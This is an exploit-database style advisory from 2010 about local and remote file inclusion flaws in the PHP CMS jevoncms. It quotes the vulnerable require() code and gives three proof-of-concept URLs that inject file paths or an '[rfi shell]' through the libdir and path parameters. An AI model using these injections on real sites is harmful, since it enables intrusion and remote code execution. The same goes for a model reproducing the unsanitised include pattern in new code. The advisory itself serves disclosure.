jevoncms - Local/Remote File Inclusion

EDB-ID:

12071

CVE:

N/A




Platform:

PHP

Date:

2010-04-05


########################################################
	jevoncms (LFI/RFI) Multiple Vulnerabilities
########################################################

[+]Title	:	jevoncms (libdir) Multiple Vulnerability
[+]Version:	-
[+]Download:	http://sourceforge.net/projects/jevoncms/files/
[+]Author:	eidelweiss
[+]Contact:	eidelweiss[at]cyberservices[dot]com	

	[!]Thank`s To: all friends

########################################################

	-=[ Vuln C0de ]=-
***************************
[-] jevoncms/php/main/jevoncms.php

$_PHPLIB["libdir"] = "phplib/"; 
require($_PHPLIB["libdir"] ."template.inc");      /* Disable this, if you are not using templates. */
require("template/jvc_template.php");
require("php/main/database/jvc_Database.php");

***************************
[-] jevoncms/php/main/template/jvc_template.php

if($type!=$lasttype && $type!=''){
  $path= "php/".$type."/".$type.".php" ;
 // echo $path;
  require($path);

***************************
[-] jevoncms/php/menu/menu.php

//require($_PHPLIB["libdir"] ."template.inc");      /* Disable this, if you are not using templates. */

***************************

	-=[ Proof Of Concept ]=-


	http://127.0.0.1/jevoncms/php/main/jevoncms.php?libdir=[lfi]

	http://127.0.0.1/jevoncms/php/main/template/jvc_template.php?path= [rfi shell]

	http://127.0.0.1/jevoncms/php/menu/menu.php?libdir=[lfi]

######################=[E0F]=#############################